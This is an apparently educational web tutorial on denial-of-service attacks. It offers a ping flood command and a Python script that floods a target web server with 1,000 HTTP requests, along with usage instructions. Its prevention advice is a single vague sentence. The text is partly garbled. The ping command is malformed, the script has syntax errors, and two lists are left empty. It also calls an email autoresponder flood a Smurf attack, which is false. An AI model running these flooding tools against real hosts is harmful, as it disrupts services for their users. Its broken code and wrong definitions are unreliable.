Denial of Service and Prevention

Denial of Service (DoS) is a cyber-attack on an individual Computer or Website with intent to deny services to intended users.Their purpose is to disrupt an organization’s network operations by denying access to its users.Denial of service is typically accomplished by flooding the targeted machine or resource with surplus requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
For example, if a bank website can handle 10 people a second clicking the Login button, an attacker only has to send 10 fake requests per second to make it so no legitimate users can login.

DoS attacks exploit various weaknesses in computer network technologies. They may target servers, network routers, or network communication links. They can cause computers and routers to crash and links to bog down.

The most famous DoS technique is Ping of Death. The Ping of Death attack works by generating and sending special network messages (specifically, ICMP packets of non-standard sizes) that cause problems for systems that receive them. In the early days of the Web, this attack could cause unprotected Internet servers to crash quickly.

It is strongly recommended to try all described activity on virtual machines rather than your working environment

Following is the command for performing flooding of request on an IP



ping ip_address –t -65500

HERE,

Other basic types of DoS attacks involve

Another variant of the DoS is the Smurf_attack. This involves emails with automatic responses. If someone emails hundreds of email messages with a fake return email address to hundreds of people in an organization with an autoresponder on in their email, the initial sent messages can become thousands sent to the fake email address. If that fake email address actually belongs to someone, this can overwhelm that person’s account.

DoS attacks can cause the following problems:

Following is the python script for performing denial of service attack for small website which didn’t expect so much socket connection

filter_none

edit
close

play_arrow

link
brightness_4
code

# Please note that running this code might
# cause your IP blocked by server. And purpose
# of this code is only learning.
import socket, sys, os  
print "][ Attacking " + sys.argv[1+ " ... ]["  
print "injecting " + sys.argv[2];  
def attack():  
    #pid = os.fork()  
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    s.connect((sys.argv[1], 80))  
    print ">> GET /" + sys.argv[2] + " HTTP/1.1"  
    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")  
    s.send("Host: " + sys.argv[1+ "\r\n\r\n");  
    s.close()  
  
# Driver code
for i in range(1, 1000):  
    attack() 
chevron_right

We can use above code as

python ddos.py target_ip_address apache

Prevention

Given that Denial of Service (DoS) attacks are becoming more frequent, it is a good time to review the basics and how we can fight back.

To safeguard from these attack you have to apply secure coding and design strong architecture which can prevent these kind of attacks and update day-to-day solution to bug of your website.

References
https://www.owasp.org/index.php/Denial_of_Service
https://en.wikipedia.org/wiki/Denial-of-service_attack

This article is contributed by Akash Sharan. If you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to contribute@geeksforgeeks.org. See your article appearing on the GeeksforGeeks main page and help other Geeks.

Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above.

Attention reader! Don’t stop learning now. Get hold of all the important CS Theory concepts for SDE interviews with the CS Theory Course at a student-friendly price and become industry ready.




Article Tags :
Practice Tags :